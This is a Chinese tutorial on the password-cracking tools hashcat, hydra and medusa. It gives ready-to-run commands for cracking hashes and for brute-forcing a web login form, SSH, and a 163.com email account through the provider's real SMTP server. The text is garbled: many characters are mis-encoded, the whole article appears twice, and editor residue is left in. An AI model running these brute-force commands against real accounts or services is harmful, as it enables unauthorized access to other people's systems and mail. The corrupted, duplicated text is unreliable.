密碼破解，我們?cè)谇懊娴奈恼轮兄v到過很多次。本文將我們最常用的幾款工具在進(jìn)行簡(jiǎn)單的復(fù)述。希望對(duì)你的學(xué)習(xí)有所幫助。

hashcat

Hashcat是什么呢？Hashcat是當(dāng)前最強(qiáng)大的開源密碼恢復(fù)工具，你可以訪問Hashcat.net網(wǎng)站來了解這款工具的詳細(xì)情況。本質(zhì)上，Hashcat 3.0是一款高級(jí)密碼恢復(fù)工具，可以利用CPU或GPU資源來攻擊160多種哈希類型的密碼

示例：

hashcat -m 0 hash.txt /usr/share/wordlist/pass.txt

• -m后面跟hash類型

• hash.txt里存要破解的hash

• pass.txt是kali linux中自帶的字典,也可以是你的字典。當(dāng)然沒有字典我們可以枚舉破解。

如8位數(shù)的從數(shù)字密碼。

hashcat -a 3 ?-m 2500 777.hccapx ?d?d?d?d?d?d?d?d --force

hydra

hydra（thc hydra）是一個(gè)在線密碼攻擊工具。它在telnet、ssh、http、https、smb、snmp、smtp等實(shí)時(shí)服務(wù)上強(qiáng)制各種組合。示例破解網(wǎng)站登錄

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^password=^PASS^:Invalid" -t 64

• -l代表輸入的^USER^值，可以是字典，我們這里指定是admin

• -P代表輸入的^PASS^值，這里選擇rockyou.txt字典

• 10.10.10.43是目標(biāo)服務(wù)器的IP

• http-post-form為請(qǐng)求方法POST 破解郵箱密碼（需開啟smtp服務(wù)）

hydra -s 465 -S -v -V -l xxxx@163.com -P /root/zi.txt -t 16 smtp.163.com smtp

• -s 端口號(hào) 之前默認(rèn)為25 現(xiàn)在基本啟用了,改為了支持ssl協(xié)議的465`

• -v 顯示詳細(xì)過程

• -l 郵箱賬號(hào)

• -P 字典路勁

• -t 破解線程

mesuda

mesuda也是我們常用的破解工具之一，支持的協(xié)議也比較多。如破解ssh密碼

medusa -h 10.10.10.171 -U user.txt -P passwords.txt -M ssh 10.10.10.171

總結(jié)

以上便是在kali中常用到的幾款密碼破解工具，無論是那個(gè)工具都是依賴于字典和枚舉破解兩種形式。前者能否成功在于你的字典，后者能否成功在于你的計(jì)算機(jī)性能。

密碼破解，我們?cè)谇懊娴奈恼轮兄v到過很多次。本文將我們最常用的幾款工具在進(jìn)行簡(jiǎn)單的復(fù)述。希望對(duì)你的學(xué)習(xí)有所幫助。

hashcat

Hashcat是什么呢？Hashcat是當(dāng)前最強(qiáng)大的開源密碼恢復(fù)工具，你可以訪問Hashcat.net網(wǎng)站來了解這款工具的詳細(xì)情況。本質(zhì)上，Hashcat 3.0是一款高級(jí)密碼恢復(fù)工具，可以利用CPU或GPU資源來攻擊160多種哈希類型的密碼

示例：

hashcat -m 0 hash.txt /usr/share/wordlist/pass.txt

• -m后面跟hash類型

• hash.txt里存要破解的hash

• pass.txt是kali linux中自帶的字典,也可以是你的字典。當(dāng)然沒有字典我們可以枚舉破解。

編輯切換為居中

如8位數(shù)的從數(shù)字密碼。

hashcat -a 3 ?-m 2500 777.hccapx ?d?d?d?d?d?d?d?d --force

編輯

hydra

hydra（thc hydra）是一個(gè)在線密碼攻擊工具。它在telnet、ssh、http、https、smb、snmp、smtp等實(shí)時(shí)服務(wù)上強(qiáng)制各種組合。示例破解網(wǎng)站登錄

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^password=^PASS^:Invalid" -t 64

• -l代表輸入的^USER^值，可以是字典，我們這里指定是admin

• -P代表輸入的^PASS^值，這里選擇rockyou.txt字典

• 10.10.10.43是目標(biāo)服務(wù)器的IP

• http-post-form為請(qǐng)求方法POST 破解郵箱密碼（需開啟smtp服務(wù)）

hydra -s 465 -S -v -V -l xxxx@163.com -P /root/zi.txt -t 16 smtp.163.com smtp

• -s 端口號(hào) 之前默認(rèn)為25 現(xiàn)在基本啟用了,改為了支持ssl協(xié)議的465`

• -v 顯示詳細(xì)過程

• -l 郵箱賬號(hào)

• -P 字典路勁

• -t 破解線程

mesuda

mesuda也是我們常用的破解工具之一，支持的協(xié)議也比較多。如破解ssh密碼

medusa -h 10.10.10.171 -U user.txt -P passwords.txt -M ssh 10.10.10.171

總結(jié)

以上便是在kali中常用到的幾款密碼破解工具，無論是那個(gè)工具都是依賴于字典和枚舉破解兩種形式。前者能否成功在于你的字典，后者能否成功在于你的計(jì)算機(jī)性能。

【密碼破解學(xué)習(xí)資料與工具下載】